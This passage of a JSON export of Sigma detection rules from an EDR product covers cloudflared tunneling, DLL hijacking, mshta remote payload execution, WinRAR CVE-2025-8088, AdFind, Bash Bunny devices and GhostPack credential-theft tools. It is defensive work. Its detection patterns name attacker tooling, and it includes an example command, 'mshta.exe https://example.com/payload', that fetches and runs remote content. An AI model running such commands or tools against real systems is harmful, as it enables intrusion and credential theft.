"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603985Z",
"creation_date": "2026-03-23T11:45:34.603988Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603996Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cloudflare/cloudflared",
"https://blog.reconinfosec.com/emergence-of-akira-ransomware-group",
"https://attack.mitre.org/techniques/T1572/"
],
"name": "t1572_cloudfare_tunneling_cmdline.yml",
"content": "title: Cloudflared Tunneling CommandLine Detected\nid: 568f6fdb-3564-4318-bf83-552ed6516300\ndescription: |\n Detects a command-line that is associated with the cloudflared Tunnel agent (a 'tunnel * run --token' or 'tunnel * --config * run' invocation), regardless of the executable name, so renamed copies of the agent are covered as well.\n cloudflared is a tunneling daemon that establishes an outbound connection to the Cloudflare network and proxies traffic from it to local services, exposing them without any inbound firewall rule.\n This has been seen in use by threat actors such as Akira ransomware to tunnel into internal infrastructure.\n Note that legitimate cloudflared deployments produce the same command line, and that the '--token' form places the tunnel credential in the recorded command line, so treat the alert data as sensitive.\n It is recommended to investigate the process's and daemon's network connections to determine if this activity is normal in your infrastructure.\nreferences:\n - https://github.com/cloudflare/cloudflared\n - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group\n - https://attack.mitre.org/techniques/T1572/\ndate: 2023/05/11\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Cloudflared\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Tunneling\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains:\n - \"tunnel * run --token\"\n - \"tunnel * --config * run\"\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "568f6fdb-3564-4318-bf83-552ed6516300",
"rule_name": "Cloudflared Tunneling CommandLine Detected",
"rule_description": "Detects a command-line that is associated with the cloudflared Tunnel agent (a 'tunnel * run --token' or 'tunnel * --config * run' invocation), regardless of the executable name, so renamed copies of the agent are covered as well.\ncloudflared is a tunneling daemon that establishes an outbound connection to the Cloudflare network and proxies traffic from it to local services, exposing them without any inbound firewall rule.\nThis has been seen in use by threat actors such as Akira ransomware to tunnel into internal infrastructure.\nNote that legitimate cloudflared deployments produce the same command line, and that the '--token' form places the tunnel credential in the recorded command line, so treat the alert data as sensitive.\nIt is recommended to investigate the process's and daemon's network connections to determine if this activity is normal in your infrastructure.\n",
"rule_creation_date": "2023-05-11",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56b4092b-c97b-4030-aec7-939c18d9289c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077492Z",
"creation_date": "2026-03-23T11:45:34.077494Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077498Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_musnotifyicon.yml",
"content": "title: DLL Hijacking via musnotifyicon.exe\nid: 56b4092b-c97b-4030-aec7-939c18d9289c\ndescription: |\n Detects potential Windows DLL hijacking via musnotifyicon.exe: a copy of the Microsoft-signed musnotifyicon.exe running from outside System32, SysWOW64 or WinSxS that loads DMCmnUtils.dll, UPShared.dll, uxtheme.dll, WINHTTP.dll or XmlLite.dll from outside those directories, when the loaded DLL is not itself signed by Microsoft.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'musnotifyicon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\UPShared.dll'\n - '\\uxtheme.dll'\n - '\\WINHTTP.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56b4092b-c97b-4030-aec7-939c18d9289c",
"rule_name": "DLL Hijacking via musnotifyicon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via musnotifyicon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in that same folder, where the loader finds it before the genuine library.\nExecutions from, and library loads from, the System32, SysWOW64 and WinSxS directories are excluded, as are Microsoft-signed libraries.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56bae207-eb3c-45be-90d9-0408b650bcc4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075386Z",
"creation_date": "2026-03-23T11:45:34.075388Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075393Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/threat-detection-report/techniques/mshta/",
"https://lolbas-project.github.io/lolbas/Binaries/Mshta/",
"https://attack.mitre.org/techniques/T1218/005/"
],
"name": "t1218_005_remote_content_execution_mshta.yml",
"content": "title: Remote Content Executed via Mshta\nid: 56bae207-eb3c-45be-90d9-0408b650bcc4\ndescription: |\n Detects mshta.exe being launched with a command line that contains an HTTP or HTTPS URL, i.e. the execution of a remote payload.\n Mshta is a signed Windows binary that can proxy the execution of malicious HTA or script content, which adversaries use to evade application control and to download and run further payloads.\n It is recommended to investigate the remote file and the actions it performed to ensure the action was legitimate.\nreferences:\n - https://redcanary.com/threat-detection-report/techniques/mshta/\n - https://lolbas-project.github.io/lolbas/Binaries/Mshta/\n - https://attack.mitre.org/techniques/T1218/005/\ndate: 2024/02/05\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # mshta.exe https://example.com/payload\n selection:\n OriginalFileName: 'MSHTA.EXE'\n CommandLine|contains:\n - ' http://'\n - ' https://'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56bae207-eb3c-45be-90d9-0408b650bcc4",
"rule_name": "Remote Content Executed via Mshta",
"rule_description": "Detects mshta.exe being launched with a command line that contains an HTTP or HTTPS URL, i.e. the execution of a remote payload.\nMshta is a signed Windows binary that can proxy the execution of malicious HTA or script content, which adversaries use to evade application control and to download and run further payloads.\nIt is recommended to investigate the remote file and the actions it performed to ensure the action was legitimate.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56c9f2fa-7332-4c35-973b-9ff587dbdd2f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294344Z",
"creation_date": "2026-03-23T11:45:35.294348Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294355Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_list_macos.yml",
"content": "title: Cron Jobs Enumerated via Crontab (macOS)\nid: 56c9f2fa-7332-4c35-973b-9ff587dbdd2f\ndescription: |\n Detects the execution of the crontab command with the -l option, which lists the cron jobs of the current user.\n An attacker could use the listing to identify scheduled scripts with weak permissions and inject malicious behaviour into them, so that attacker-controlled code runs on the job's schedule.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/24\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/crontab'\n CommandLine|contains: ' -l'\n ParentImage|contains: '?'\n\n exclusion_meraki:\n GrandparentCommandLine: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/com.meraki.scriptonly.??????/postinstall /Library/Application Support/Meraki/*'\n\n exclusion_knockknock:\n ParentImage: '/Applications/KnockKnock.app/Contents/MacOS/KnockKnock'\n\n exclusion_mackeeper:\n ParentImage:\n - '/applications/mackeeper.app/contents/library/launchagents/mackeeperagent.app/contents/macos/mackeeperagent'\n - '/library/privilegedhelpertools/com.mackeeper.mackeeperprivilegedhelper'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56c9f2fa-7332-4c35-973b-9ff587dbdd2f",
"rule_name": "Cron Jobs Enumerated via Crontab (macOS)",
"rule_description": "Detects the execution of the crontab command with the -l option, which lists the cron jobs of the current user.\nAn attacker could use the listing to identify scheduled scripts with weak permissions and inject malicious behaviour into them, so that attacker-controlled code runs on the job's schedule.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-11-24",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56dfdfb3-5fef-4368-8250-dd5afca44520",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091999Z",
"creation_date": "2026-03-23T11:45:34.092001Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092005Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sciencedirect.com/science/article/pii/S2666281721000986",
"https://securelist.com/darkvishnya/89169/",
"https://attack.mitre.org/techniques/T1091/",
"https://attack.mitre.org/techniques/T1200/"
],
"name": "t1200_bash_bunny_usage.yml",
"content": "title: Bash Bunny Malicious USB Key Detected\nid: 56dfdfb3-5fef-4368-8250-dd5afca44520\ndescription: |\n Detects a USB device registry entry being written with the default Bash Bunny identifiers (vendor ID F000, product ID FF03).\n Bash Bunny is a physical media payload platform that can deploy payloads after insertion on a computer.\n Once plugged into a computer, custom payloads can be used to perform malicious activities.\n Only the default identifiers are matched, so a device reconfigured to present another vendor or product ID will not trigger this rule.\n It is recommended to conduct a forensic investigation to see if files were exfiltrated or other malicious actions were taken.\n The sciencedirect article in the references may help indicate what artifacts might be generated.\nreferences:\n - https://www.sciencedirect.com/science/article/pii/S2666281721000986\n - https://securelist.com/darkvishnya/89169/\n - https://attack.mitre.org/techniques/T1091/\n - https://attack.mitre.org/techniques/T1200/\ndate: 2023/03/21\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1200\n - attack.t1091\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.BashBunny\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # BashBunny uses the F000 vendor ID, which is not associated to any vendor, and FF03 product ID.\n # The IDs are added to registry by the usbstor.sys driver.\n TargetObject|contains:\n - 'SYSTEM\\CurrentControlSet\\Control\\usbflags\\F000FF03????'\n - 'SYSTEM\\CurrentControlSet\\Enum\\USB\\VID_F000&PID_FF03'\n\n condition: selection\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56dfdfb3-5fef-4368-8250-dd5afca44520",
"rule_name": "Bash Bunny Malicious USB Key Detected",
"rule_description": "Detects a USB device registry entry being written with the default Bash Bunny identifiers (vendor ID F000, product ID FF03).\nBash Bunny is a physical media payload platform that can deploy payloads after insertion on a computer.\nOnce plugged into a computer, custom payloads can be used to perform malicious activities.\nOnly the default identifiers are matched, so a device reconfigured to present another vendor or product ID will not trigger this rule.\nIt is recommended to conduct a forensic investigation to see if files were exfiltrated or other malicious actions were taken.\nThe sciencedirect article in the references may help indicate what artifacts might be generated.\n",
"rule_creation_date": "2023-03-21",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1091",
"attack.t1200"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56f219b0-67df-4050-90cd-053d9320bbca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092257Z",
"creation_date": "2026-03-23T11:45:34.092259Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092263Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/",
"https://nvd.nist.gov/vuln/detail/CVE-2025-8088",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1203_winrar_cve_2025_8088.yml",
"content": "title: WinRAR CVE-2025-8088 Vulnerability Exploited\nid: 56f219b0-67df-4050-90cd-053d9320bbca\ndescription: |\n Detects the creation of a file by WinRAR in an auto-start location, which is consistent with the exploitation of CVE-2025-8088, a vulnerability affecting WinRAR.\n CVE-2025-8088 is a path traversal zero-day vulnerability in WinRAR versions before 7.13 that lets a crafted archive write files outside the chosen extraction directory by hiding the target path in alternate data streams, enabling silent placement of malicious files in startup locations (Startup folders, PowerShell profiles, Office startup directories) that are executed automatically at the next logon or application launch.\n This vulnerability has been actively exploited by the RomCom threat actor to deliver backdoors and establish persistence on compromised systems.\n It is recommended to investigate the content of the archive and the created file to determine their legitimacy; a user deliberately extracting an archive into one of these locations is a possible false positive, and extraction by a tool other than WinRAR.exe is not covered.\nreferences:\n - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\n - https://nvd.nist.gov/vuln/detail/CVE-2025-8088\n - https://attack.mitre.org/techniques/T1203/\ndate: 2025/08/13\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.002\n - attack.t1203\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.CVE-2025-8088\n - classification.Windows.Exploit.WinRAR\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\WinRAR.exe'\n Path|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '\\Documents\\PowerShell\\profile.ps1'\n - '\\Documents\\WindowsPowerShell\\profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n - '\\Documents\\PowerShell\\\\*_profile.ps1'\n - '\\Documents\\WindowsPowerShell\\\\*_profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\\\*_profile.ps1'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLStart\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Addins\\'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56f219b0-67df-4050-90cd-053d9320bbca",
"rule_name": "WinRAR CVE-2025-8088 Vulnerability Exploited",
"rule_description": "Detects the creation of a file by WinRAR in an auto-start location, which is consistent with the exploitation of CVE-2025-8088, a vulnerability affecting WinRAR.\nCVE-2025-8088 is a path traversal zero-day vulnerability in WinRAR versions before 7.13 that lets a crafted archive write files outside the chosen extraction directory by hiding the target path in alternate data streams, enabling silent placement of malicious files in startup locations (Startup folders, PowerShell profiles, Office startup directories) that are executed automatically at the next logon or application launch.\nThis vulnerability has been actively exploited by the RomCom threat actor to deliver backdoors and establish persistence on compromised systems.\nIt is recommended to investigate the content of the archive and the created file to determine their legitimacy; a user deliberately extracting an archive into one of these locations is a possible false positive, and extraction by a tool other than WinRAR.exe is not covered.\n",
"rule_creation_date": "2025-08-13",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1547.001",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5731e436-612e-43cb-872d-82344b85d732",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627748Z",
"creation_date": "2026-03-23T11:45:34.627750Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627754Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://www.joeware.net/freetools/tools/adfind/",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1016/",
"https://attack.mitre.org/software/S0552/"
],
"name": "adfind_usage.yml",
"content": "title: AdFind Binary Executed\nid: 5731e436-612e-43cb-872d-82344b85d732\ndescription: |\n Detects the execution of the AdFind binary.\n AdFind is a legitimate tool that has been used by numerous threat actors for conducting enumeration in an Active Directory network.\n It is recommended to determine if this binary is expected to be used in your environment and to look for other suspicious actions on the host.\nreferences:\n - http://www.joeware.net/freetools/tools/adfind/\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1016/\n - https://attack.mitre.org/software/S0552/\ndate: 2020/12/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.002\n - attack.t1018\n - attack.t1016\n - attack.s0552\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AdFind\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\AdFind.exe'\n\n # This is handled by the rule 8ad5b489-e501-424e-b275-b55b2e88f3f0\n filter_cmds:\n CommandLine|contains:\n - '-sc trustdmp'\n - '-sc admincountdmp'\n - 'objectclass=trusteddomain'\n - 'objectcategory=computer'\n - 'objectcategory=organizationalUnit'\n\n condition: selection and not 1 of filter_*\nfalsepositives:\n - Legitimate use of AdFind by an administrator or 3rd party application\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5731e436-612e-43cb-872d-82344b85d732",
"rule_name": "AdFind Binary Executed",
"rule_description": "Detects the execution of the AdFind binary.\nAdFind is a legitimate tool that has been used by numerous threat actors for conducting enumeration in an Active Directory network.\nIt is recommended to determine if this binary is expected to be used in your environment and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2020-12-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016",
"attack.t1018",
"attack.t1069.002",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "57784113-77b2-47c2-bc1f-def4af23b6be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085989Z",
"creation_date": "2026-03-23T11:45:34.085991Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085995Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/GhostPack/",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_dotnet_assembly_load_known_malicious.yml",
"content": "title: GhostPack Malicious Dotnet Assembly Loaded\nid: 57784113-77b2-47c2-bc1f-def4af23b6be\ndescription: |\n Detects the in-memory loading of a .NET assembly whose name matches SpecterOps' GhostPack tooling; loads backed by a file on disk (module IL path containing a drive letter) are excluded, so a match indicates reflective code loading.\n GhostPack is a collection of C# offensive security tools developed by SpecterOps for conducting penetration testing and red team operations.\n Attackers may use these tools or their modified variants to compromise Active Directory environments.\n Because only the assembly name is matched, a variant rebuilt under a different name will not trigger this rule.\n It is recommended to investigate the process loading the assembly, analyze the specific GhostPack tool being executed, and check for indicators of credential theft or privilege escalation attempts.\nreferences:\n - https://github.com/GhostPack/\n - https://attack.mitre.org/techniques/T1620/\ndate: 2025/03/03\nmodified: 2025/06/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n AssemblyFlags: '0x0'\n AssemblyName:\n - 'seatbelt'\n - 'certify'\n - 'KeeTheft'\n - 'lockless'\n - 'rubeus'\n - 'safetykatz'\n - 'sharpchrome'\n - 'sharpdpapi'\n - 'sharpdump'\n - 'sharproast'\n - 'sharpup'\n - 'sharpwmi'\n - 'SharPersist'\n\n filter_path:\n ModuleILPath|contains: ':\\'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
